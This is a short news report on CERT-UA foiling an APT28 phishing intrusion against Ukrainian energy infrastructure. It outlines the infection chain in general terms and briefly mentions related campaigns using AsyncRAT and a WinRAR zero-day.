Ukrainian CERT thwarts APT28 cyberattack on critical energy infrastructure

September 06, 2023THNCyberattack/Critical Infrastructure

Ukraine’s Computer Emergency Response Team (CERT-UA) said on Tuesday it had foiled a cyberattack on unnamed critical energy infrastructure in the country.

The intrusion, according to the agency, began with a phishing email containing a link to a malicious ZIP archive that activates the infection chain.

“Visiting the link will download a ZIP archive containing three JPG images (decoys) and a BAT file ‘weblinks.cmd’ to the victim’s computer”, CERT-UA saidattributing it to the Russian threat actor known as APT28 (aka BlueDelta, Fancy Bear, Forest Blizzard or FROZENLAKE).

“When a CMD file is executed, several decoy web pages will be opened, .bat and .vbs files will be created and a VBS file will be launched, which in turn will execute the BAT file.”

The next phase of the attack involves running the “whoami” command on the compromised host and exfiltrating the information, as well as downloading the hidden TOR service to route the malicious traffic.

Persistence is achieved by means of a scheduled task and remote command execution is implemented using cURL via a legitimate service called webhook.site, which was recently revealed to be used by a malicious actor known as Dark Pink.

CERT-UA said the attack ultimately failed due to access to Mocky and Windows Script Host (wscript.exe) has been restricted. It should be noted that APT28 has been linked to the use of Mocky APIs in the past.

Disclosure comes in the middle ongoing phishing attacks targeting Ukraine, some of which were observed leveraging an off-the-shelf malware obfuscation engine named ScruptCrypt to distribute AsyncRAT.

Another cyberattack mounted by GhostWriter (aka UAC-0057 or UNC1151) allegedly used a recently revealed zero-day flaw in WinRAR (CVE-2023-38831, CVSS score: 7.8) to deploy PicassoLoader and Cobalt Strike, the agency said.